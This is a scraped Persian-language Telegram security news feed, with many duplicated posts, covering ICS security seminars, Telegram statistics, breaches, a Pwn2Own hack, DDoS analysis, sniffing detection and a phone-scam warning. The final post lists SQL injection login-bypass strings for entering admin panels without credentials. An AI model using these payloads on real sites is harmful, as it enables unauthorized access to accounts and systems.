Forwarded from سازمان نظام صنفی رایانهای استان تهران
✅سمینار امنیت سایبری در زیرساختهای کنترل صنعتی به همت #کمیسیون_افتا و با ارائه اسماعیل باقری اصل برگزار می شود.
🔺در این سمینار در مورد زیرساختهای صنعتی و بررسی آنها از نظر، فرآیند، درجه اهمیت، برندها، پروتکلها بحث خواهد شد.
🔺 همچنین تهدیدات مانا و پیشرفته و بررسی چند نمونه از آن نیز در این نشست مورد بررسی قرار خواهند گرفت.
🔺آموزش و آگاهی رسانی در خصوص تهدیدات و حملات مانا و پیشرفته در حوزه زیرساختهای صنعتی کشور و همچنین ارائه راهکارجامع و یکپارچه امنیت در زیرساختهای صنعتی از اهداف این سمینار عنوان شده اند.
🔺سر فصل های ارائه شده در این سمینار به شرح زیر خواهد بود:
📍 مبانی و اصول سیستمهای کنترل صنعتی
- انواع فرآیندهای صنعتی، برندهای غیر بومی(جنگی نابرابر)، پروتکلها، فرآوانی حضور برندها
📍 بیان مسئله و اهمیت
- مرزبندی ایمنی و امنیت، جنگ سایبری از رویا تا واقعیت، حوادث مشکوک با منشا نامعلوم
📍حمله به زیرساختهای صنعتی
-مخاطرات در زیرساختهای حساس و حیاتی، توزیع آسیبپذیریها، بررسی حوادث سایبری در جهان، تشریح APT و Kill Chain در سیستمهای کنترل صنعتی
📍 چالشها در زیرساختهای صنعتی
- ایزوله سازی و Air-Gap، آسیبپذیریهای ذاتی، تغییر محیط و افزایش ریسک، چالشهای فرآیندی
- راهکار جامع و یکپارچه امنیت در زیرساختهای صنعتی
- شناسایی و ارزیابی، امنسازی، تشخیص، پاسخگویی به رخدادها و بلوغ و آگاهیرسانی
🔺این سمینار ۲۲ آبان ماه سال جاری برگزار خواهد شد.
@TICTguild
شرح کامل خبر
🔺در این سمینار در مورد زیرساختهای صنعتی و بررسی آنها از نظر، فرآیند، درجه اهمیت، برندها، پروتکلها بحث خواهد شد.
🔺 همچنین تهدیدات مانا و پیشرفته و بررسی چند نمونه از آن نیز در این نشست مورد بررسی قرار خواهند گرفت.
🔺آموزش و آگاهی رسانی در خصوص تهدیدات و حملات مانا و پیشرفته در حوزه زیرساختهای صنعتی کشور و همچنین ارائه راهکارجامع و یکپارچه امنیت در زیرساختهای صنعتی از اهداف این سمینار عنوان شده اند.
🔺سر فصل های ارائه شده در این سمینار به شرح زیر خواهد بود:
📍 مبانی و اصول سیستمهای کنترل صنعتی
- انواع فرآیندهای صنعتی، برندهای غیر بومی(جنگی نابرابر)، پروتکلها، فرآوانی حضور برندها
📍 بیان مسئله و اهمیت
- مرزبندی ایمنی و امنیت، جنگ سایبری از رویا تا واقعیت، حوادث مشکوک با منشا نامعلوم
📍حمله به زیرساختهای صنعتی
-مخاطرات در زیرساختهای حساس و حیاتی، توزیع آسیبپذیریها، بررسی حوادث سایبری در جهان، تشریح APT و Kill Chain در سیستمهای کنترل صنعتی
📍 چالشها در زیرساختهای صنعتی
- ایزوله سازی و Air-Gap، آسیبپذیریهای ذاتی، تغییر محیط و افزایش ریسک، چالشهای فرآیندی
- راهکار جامع و یکپارچه امنیت در زیرساختهای صنعتی
- شناسایی و ارزیابی، امنسازی، تشخیص، پاسخگویی به رخدادها و بلوغ و آگاهیرسانی
🔺این سمینار ۲۲ آبان ماه سال جاری برگزار خواهد شد.
@TICTguild
شرح کامل خبر
آخرین آمار #تلگرام طبق اعلام امیر خوراکیان، معاون محتوایی مرکز ملی فضای مجازی:
🔸 ۵۸۰ هزار کانال تلگرام در حال حاضر در کشور وجود دارد که در این بین ۱۶ کانال تلگرامی بالای یک میلیون نفر عضو دارند.
🔸 در حال حاضر ۴۰ میلیون ایرانی عضو پیام رسان تلگرام هستند که بیش از ۶۰ درصد پهنای باند کشور به تلگرام اختصاص یافته و ساعات اوج ترافیک این پیام رسان نیز از ساعت ۲۲ تا ۱ شب است.
🔸 همچنین ۵۸۰ هزار کانال در تلگرام در حال حاضر در کشور وجود دارد که در این بین ۱۶ کانال تلگرامی بالای یک میلیون نفر عضو دارد.
🔸 بیشترین تعداد عضو یک کانال تلگرامی ۳میلیون ۴۰۰ هزار نفر است و بیشترین بازید از یک پیام نیز در حال حاضر ۲۰ میلیون نفر است.
👁 @intsec
🔸 ۵۸۰ هزار کانال تلگرام در حال حاضر در کشور وجود دارد که در این بین ۱۶ کانال تلگرامی بالای یک میلیون نفر عضو دارند.
🔸 در حال حاضر ۴۰ میلیون ایرانی عضو پیام رسان تلگرام هستند که بیش از ۶۰ درصد پهنای باند کشور به تلگرام اختصاص یافته و ساعات اوج ترافیک این پیام رسان نیز از ساعت ۲۲ تا ۱ شب است.
🔸 همچنین ۵۸۰ هزار کانال در تلگرام در حال حاضر در کشور وجود دارد که در این بین ۱۶ کانال تلگرامی بالای یک میلیون نفر عضو دارد.
🔸 بیشترین تعداد عضو یک کانال تلگرامی ۳میلیون ۴۰۰ هزار نفر است و بیشترین بازید از یک پیام نیز در حال حاضر ۲۰ میلیون نفر است.
👁 @intsec
Forwarded from Ping Channel (علی کیائیفر)
Zero Trust Seminar For Ping Channel- Ali Kiaeifar.pdf
2.9 MB
🔶فایل ارائه سمینار Zero Trust که بمناسبت هفته پدافند غیرعامل در سازمان فناوری اطلاعات اهواز برای مدیران فناوری اطلاعات استان خوزستان ارائه شده است تقدیم به مخاطبان ارجمند می گردد.
▪️تعداد کمی از اسلایدها بدلیل غیرقابل انتشار بودن بصورت عمومی، ناچارا حذف شده اند.
▪️حجم فایل PPT بالاست و مناسب انتشار در کانال نبود. در صورتی که به فایل PPT نیاز داشتید برای من ( @Kiaeifar ) پیام بفرستید تا تقدیم شود.
🆔 @PingChannel
مدیران شبکه و امنیت
▪️تعداد کمی از اسلایدها بدلیل غیرقابل انتشار بودن بصورت عمومی، ناچارا حذف شده اند.
▪️حجم فایل PPT بالاست و مناسب انتشار در کانال نبود. در صورتی که به فایل PPT نیاز داشتید برای من ( @Kiaeifar ) پیام بفرستید تا تقدیم شود.
🆔 @PingChannel
مدیران شبکه و امنیت
This media is not supported in your browser
VIEW IN TELEGRAM
🔺 لیست نقض اطلاعات و حملات سایبری در اکتبر 2019
در ماه اکتبر جاری که کارشناسان امنیتی در سراسر اروپا در حال افزایش آگاهی و جمع آوری اطلاعات در حوزه امنیت سایبری بودند، سازمانهای مختلف اروپایی در گزارشات آماری و کمیتی خود که از data protection داشتند، به نتایجی متفاوت از هم رسیدند.
حدود421 میلیون رکورد نقض شده است.
منبع:
🔹 https://rb.gy/c7199c
👁 @intsec
#ویدئو
در ماه اکتبر جاری که کارشناسان امنیتی در سراسر اروپا در حال افزایش آگاهی و جمع آوری اطلاعات در حوزه امنیت سایبری بودند، سازمانهای مختلف اروپایی در گزارشات آماری و کمیتی خود که از data protection داشتند، به نتایجی متفاوت از هم رسیدند.
حدود421 میلیون رکورد نقض شده است.
منبع:
🔹 https://rb.gy/c7199c
👁 @intsec
#ویدئو
دومین لایو وزیر ارتباطات در #اینستاگرام
🔹 امشب ساعت ۸ یک لایو جذاب در اینستاگرام خواهیم داشت، چند مهمان خاص و ویژه هم حضور پیدا میکنند.حسابی جنجالی خواهد بود!
🔹 خانم زرآبادی هم دعوت میکنم در لایو شرکت کنند و دربارهی تهمتهایی که فرمودند کمی صحبت کنیم! مگر نمیگویند ادعاهاشون درسته؟
👁 @intsec
#تویتر
🔹 امشب ساعت ۸ یک لایو جذاب در اینستاگرام خواهیم داشت، چند مهمان خاص و ویژه هم حضور پیدا میکنند.حسابی جنجالی خواهد بود!
🔹 خانم زرآبادی هم دعوت میکنم در لایو شرکت کنند و دربارهی تهمتهایی که فرمودند کمی صحبت کنیم! مگر نمیگویند ادعاهاشون درسته؟
👁 @intsec
#تویتر
Forwarded from آکادمی آموزش روزبه 📚
وبینار
✴️کشف نفوذ تهدیدات پیشرفته .
📌شکار تهدیدات با استفاده از مدل ATT&CK
✳️سه شنبه ساعت ۲۱
🔷رایگان
در کانال آپارات آکادمی روزبه
@roozbeh_learning
www.roozbeh.academy
✴️کشف نفوذ تهدیدات پیشرفته .
📌شکار تهدیدات با استفاده از مدل ATT&CK
✳️سه شنبه ساعت ۲۱
🔷رایگان
در کانال آپارات آکادمی روزبه
@roozbeh_learning
www.roozbeh.academy
Forwarded from EsecurityCo
This media is not supported in your browser
VIEW IN TELEGRAM
💯 یکی از تکنیک های تست نفوذ در سطح شبکه های داخلی، استراق سمع یا sniffing است. در روش Sniffing تکنیک های مختلفی به کار برده می شود که یکی از آن ها استفاده از تکنیک ARP Poisoning می باشد که در بسته آموزشی CEHv9 به آن پرداخته شده است.
🔅نکته ای که حائز اهمیت می باشد این است که در عملیات Sniffing کارت شبکه نفوذگر باید در مد بی قاعده یا Promiscuous Mode قرار گیرد.
با توجه به مطالب مذکور این فیلم آموزشی شامل دو بخش است:
در بخش اول این فیلم آموزشی قصد داریم تا با استفاده از ابزار Wireshark، استراق سمع در شبکه را شناسایی و سیستمی که آدرس MAC آن اصطلاحا Duplicate شده است را مشخص کنیم.
در بخش دوم به چگونگی شناسایی سیستمی می پرازیم که در مد بی قاعده یا Promiscuous Mode کار می کند و این کار با استفاده از ابزار Cain & Abel انجام می گیرد.
امیدوارم از این فیلم آموزشی لذت ببرید.
🌹https://esecurity.ir
🌹021-88890912
🔅نکته ای که حائز اهمیت می باشد این است که در عملیات Sniffing کارت شبکه نفوذگر باید در مد بی قاعده یا Promiscuous Mode قرار گیرد.
با توجه به مطالب مذکور این فیلم آموزشی شامل دو بخش است:
در بخش اول این فیلم آموزشی قصد داریم تا با استفاده از ابزار Wireshark، استراق سمع در شبکه را شناسایی و سیستمی که آدرس MAC آن اصطلاحا Duplicate شده است را مشخص کنیم.
در بخش دوم به چگونگی شناسایی سیستمی می پرازیم که در مد بی قاعده یا Promiscuous Mode کار می کند و این کار با استفاده از ابزار Cain & Abel انجام می گیرد.
امیدوارم از این فیلم آموزشی لذت ببرید.
🌹https://esecurity.ir
🌹021-88890912
Forwarded from امنیت سیستمهای کنترل و اتوماسیون صنعتی (MMAhmadian.ir)
🚨انشاءالله که در سایت غنی سازی نطنز بعد از تجربه استاکسنت دیگر افشاء اطلاعات نداریم!
💐ضمن ارج نهادن به زحمات همه مسئولین و دلسوزان کشور، هدف این پست آگاهسازی مسئولین، متولیان، مشاورین و کارشناسان محترم، در جهت ارتقاء امنیت سایبر-فیزیکی صنایع کشور بوده و قصد زیرسوال بردن این عزیزان را نداریم.وظیفه شرعی و ملی ما این است که بهعنوان کوچکترین عضو جامعه امنیت سایبر صنعتی کشور مانند ششساله گذشته که تذکر دادیم ،باز تذکر دهیم!
⚡ اگر ما بگوییم افشاء اطلاعات، برخی افراد بیاطلاع میگویند: "چرا میگویید؟!" ببینید ما نمیگوییم ای عزیزان! اما راف لنگنر یکی از بزرگترین متخصصان و مشاوران عالی حوزه امنیت سامانههای کنترل صنعتی دنیا که به احترام تجربه و دانش ایشان باید به حرفهایشان احترام خاصی قائل باشیم و در آن تأملکنیم اینگونه از تصاویر و فیلمهای منتشرشده نطنز برای آموزش، هشدار و نشان ضعف امنیت سایبری ما یاد میکند! ایشان در این پست نوشته است: "ای هکرها: این محفظههای سامانههای کنترل صنعتی که شما از پشت میبینید درواقع همان نمای حملات شما هستند!"
👈توضیحات بیشتر: https://bit.ly/2qy1iJH
💐ضمن ارج نهادن به زحمات همه مسئولین و دلسوزان کشور، هدف این پست آگاهسازی مسئولین، متولیان، مشاورین و کارشناسان محترم، در جهت ارتقاء امنیت سایبر-فیزیکی صنایع کشور بوده و قصد زیرسوال بردن این عزیزان را نداریم.وظیفه شرعی و ملی ما این است که بهعنوان کوچکترین عضو جامعه امنیت سایبر صنعتی کشور مانند ششساله گذشته که تذکر دادیم ،باز تذکر دهیم!
⚡ اگر ما بگوییم افشاء اطلاعات، برخی افراد بیاطلاع میگویند: "چرا میگویید؟!" ببینید ما نمیگوییم ای عزیزان! اما راف لنگنر یکی از بزرگترین متخصصان و مشاوران عالی حوزه امنیت سامانههای کنترل صنعتی دنیا که به احترام تجربه و دانش ایشان باید به حرفهایشان احترام خاصی قائل باشیم و در آن تأملکنیم اینگونه از تصاویر و فیلمهای منتشرشده نطنز برای آموزش، هشدار و نشان ضعف امنیت سایبری ما یاد میکند! ایشان در این پست نوشته است: "ای هکرها: این محفظههای سامانههای کنترل صنعتی که شما از پشت میبینید درواقع همان نمای حملات شما هستند!"
👈توضیحات بیشتر: https://bit.ly/2qy1iJH
⭕️ اولین تمرین مشترک #جنگ_سایبری آمریکا و تایوان علیه دشمن فرضی
چینیها و کرهایها ماهیانه میلیون حمله سایبری به تایوانیها انجام میدهند و آنچه در تمرین سایبری مشترک انجام شد، دفع این گونه حملات توصیف شده است.
#مانور موسوم به Code با میزبانی مایکروسافت و در انستیتو آمریکا AIT تایوان برگزار شد و طی آن به صدها سرور دولتی حمله شد تا میزان مقاومت آنها سنجیده شود.
👁 @intsec
چینیها و کرهایها ماهیانه میلیون حمله سایبری به تایوانیها انجام میدهند و آنچه در تمرین سایبری مشترک انجام شد، دفع این گونه حملات توصیف شده است.
#مانور موسوم به Code با میزبانی مایکروسافت و در انستیتو آمریکا AIT تایوان برگزار شد و طی آن به صدها سرور دولتی حمله شد تا میزان مقاومت آنها سنجیده شود.
👁 @intsec
"آمات ساما" و "ریچارد ژو" جایز ۶۰ هزار دلاری مسابقه هک #Pwn2Own را بردند.
دو محقق حوزه امنیت با قرار دادن اکسپلویتی در آمازون اکو شو توانستند این سیستم را هک کنند و جایزه را برنده شوند.
آمازون اکو شو ۵ از نسخه قدیمی کرومیوم استفاده میکند که چند باگ و حفره امنیتی دارد و همین امر به این دو محقق کمک کرد تا کنترل کامل دستگاه را به دست بگیرند.
آمازون تاکنون مطلبی در مورد راهحل و زمان برطرف کردن این حفره امنیتی منتشر نکرده است.
👁 @intsec
دو محقق حوزه امنیت با قرار دادن اکسپلویتی در آمازون اکو شو توانستند این سیستم را هک کنند و جایزه را برنده شوند.
آمازون اکو شو ۵ از نسخه قدیمی کرومیوم استفاده میکند که چند باگ و حفره امنیتی دارد و همین امر به این دو محقق کمک کرد تا کنترل کامل دستگاه را به دست بگیرند.
آمازون تاکنون مطلبی در مورد راهحل و زمان برطرف کردن این حفره امنیتی منتشر نکرده است.
👁 @intsec
🔻 گزارش جالب از نحوه شناسایی و مقابله با حملات گسترده #DDoS به سرورهای #ابرآرون که با سوء استفاده از MTProxyهای #تلگرام صورت گرفته است.
در گزارش زیر به تحلیل این حملات توزیع شده که در نوع خود جدید محسوب می شوند پرداخته شده است.
👨💻 مطالعه کامل گزارش
👁 @intsec
در گزارش زیر به تحلیل این حملات توزیع شده که در نوع خود جدید محسوب می شوند پرداخته شده است.
👨💻 مطالعه کامل گزارش
👁 @intsec
♨️ مراقب تله کلاهبرداران، در دسترسی غیرمجاز به گوشی تلفن همراهتان باشید.
در این روش کلاهبرداری، افراد مجرم و سودجو با ایجاد دسترسی غیرمجاز به مخاطبین و شبکههای اجتماعی قربانیان، ضمن برقراری تماس تلفنی با ایشان و معرفی خود به عنوان ضابط قضائی و انجام #مهندسی_اجتماعی خاص، فرد قربانی را وادار به خاموش نمودن تلفن همراه نموده و با سوءاستفاده از موقعیت پیش آمده با ارسال پیام به مخاطبین و آشنایان ایشان در شبکههای اجتماعی تقاضای انتقال وجه فوری به دلیل مشکل مالی را مطرح نموده و از این طریق نسبت به #کلاهبرداری و دریافت وجه از آشنایان و مخاطبان فرد قربانی را مینماید.
در هنگام دریافت هرگونه پیام از سوی دوستان و آشنایان با مضمون واریز فوری پول به علت هرگونه نیازمندی ابتدا از صحت درخواست، با برقراری تماس تلفنی با فرد ارسال کننده پیام اطمینان حاصل نمایند. همچنین در هنگام انتقال وجه به حسابهای مورد نظر نام و نام خانوادگی دریافت کننده وجه را با دقت کنترل نموده و از شتاب زدگی در انجام هرگونه عملیات بانکی اجتناب نمایند.
👁 @intsec
در این روش کلاهبرداری، افراد مجرم و سودجو با ایجاد دسترسی غیرمجاز به مخاطبین و شبکههای اجتماعی قربانیان، ضمن برقراری تماس تلفنی با ایشان و معرفی خود به عنوان ضابط قضائی و انجام #مهندسی_اجتماعی خاص، فرد قربانی را وادار به خاموش نمودن تلفن همراه نموده و با سوءاستفاده از موقعیت پیش آمده با ارسال پیام به مخاطبین و آشنایان ایشان در شبکههای اجتماعی تقاضای انتقال وجه فوری به دلیل مشکل مالی را مطرح نموده و از این طریق نسبت به #کلاهبرداری و دریافت وجه از آشنایان و مخاطبان فرد قربانی را مینماید.
در هنگام دریافت هرگونه پیام از سوی دوستان و آشنایان با مضمون واریز فوری پول به علت هرگونه نیازمندی ابتدا از صحت درخواست، با برقراری تماس تلفنی با فرد ارسال کننده پیام اطمینان حاصل نمایند. همچنین در هنگام انتقال وجه به حسابهای مورد نظر نام و نام خانوادگی دریافت کننده وجه را با دقت کنترل نموده و از شتاب زدگی در انجام هرگونه عملیات بانکی اجتناب نمایند.
👁 @intsec
مجموعه دستوراتی که برای تزریق به صفحات لاگین استفاده میشود شامل موارد زیر میشود.
' or ''='
') or true—
') or ('')=('
') or 1—
') or ('x')=('
" or true—
" or ""="
" or 1—
" or "x"="
") or true—
") or ("")=("
") or 1—
") or ("x")=("
')) or true—
')) or ((''))=(('
')) or 1—
')) or (('x'))=(('
نفوذگر با قرار دادن این دستورات در صفحات لاگین یک وب سایت بدون داشتن یوزر و پسورد اقدام به #نفوذ و #حمله به پنل مدیریتی میکند.
👁 @intsec
#تزریق
' or ''='
') or true—
') or ('')=('
') or 1—
') or ('x')=('
" or true—
" or ""="
" or 1—
" or "x"="
") or true—
") or ("")=("
") or 1—
") or ("x")=("
')) or true—
')) or ((''))=(('
')) or 1—
')) or (('x'))=(('
نفوذگر با قرار دادن این دستورات در صفحات لاگین یک وب سایت بدون داشتن یوزر و پسورد اقدام به #نفوذ و #حمله به پنل مدیریتی میکند.
👁 @intsec
#تزریق